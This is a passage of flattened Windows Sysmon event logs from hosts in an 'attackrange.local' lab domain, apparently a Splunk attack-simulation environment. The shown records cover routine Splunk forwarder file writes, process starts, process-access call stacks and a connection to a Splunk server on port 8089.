Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50E2C9EB51CE133168304B428BD26284,SHA256=5A4751D863BC14BADDEAD169E2D08A61EB370BE4398C16384F4C9FC6F5EA9E29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152053Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.049{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9579C744D13501CC6013D408E455E194,SHA256=7932241C7123F299DBE29E173609663F05BA2F0EC08997C7E93C6DDAD9296D7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105277Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:08.803{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=270001EC29339939A8AC5C665001BD3D,SHA256=C9BB9F5814903731638265017CC73563BA5EBB294D2DCF7AB2D3BDFFB04F784B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000152076Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:07.464{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58430-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 10341000x8000000000000000152075Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.766{39BD8DE3-7198-60CA-300D-00000000D101}52926968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000152074Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.712{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=671263B30288147F230ED744B52F60A5,SHA256=F289A21AD5ED36EAAFED3597C990175DC7825D8AF8E5BD4A8597DC29245D2369,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000152073Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.528{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7198-60CA-300D-00000000D101}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152072Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.528{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152071Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.528{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152070Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.528{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152069Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.528{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-7198-60CA-300D-00000000D101}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000152068Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.528{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152067Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.528{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7198-60CA-300D-00000000D101}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000152066Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.529{39BD8DE3-7198-60CA-300D-00000000D101}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000152065Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.081{39BD8DE3-7197-60CA-2F0D-00000000D101}70206140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000152064Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:08.066{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2370DA545A7566EC095BFB38AFC6548,SHA256=C0EE8494D1BC6C1ED0D1AD5B6179E585A599D9E795477BEA277C7F1C96065BB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152087Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.861{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9F21CD0AAF55AD8699EC42DA0C090CBE,SHA256=A38B50CFC1C25EB9EE40251489533E47449159C913A49A50DFA02D5F6C212027,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000152086Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.466{39BD8DE3-7199-60CA-310D-00000000D101}60003956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152085Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.196{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7199-60CA-310D-00000000D101}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152084Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.196{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152083Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.196{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152082Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.196{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152081Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.196{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-7199-60CA-310D-00000000D101}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000152080Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.196{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152079Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.196{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7199-60CA-310D-00000000D101}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000152078Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.197{39BD8DE3-7199-60CA-310D-00000000D101}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000152077Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:09.081{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CF045D347D5840EB50587AB90DD0F68,SHA256=8EEBC7A77F48D4F866465921F81A9C68CB8290E396B2C50F8480ECA2393BABA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105279Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:10.173{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50A2CDF04A71E3010EFBFC1644634B36,SHA256=10889BFEB2A76EF00CF834FA8AFE7924DCE46CC5FFBC6DC65351DCA085515F00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105278Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:10.170{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A76EFED39C1A8F84A6ADC6301A513A4F,SHA256=DB6901E7A925CC3B2840C3E6B5B15A31D86D30CB89A0A8E094BEDE8F29BD3356,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000152137Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152136Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152135Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152134Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152133Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152132Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 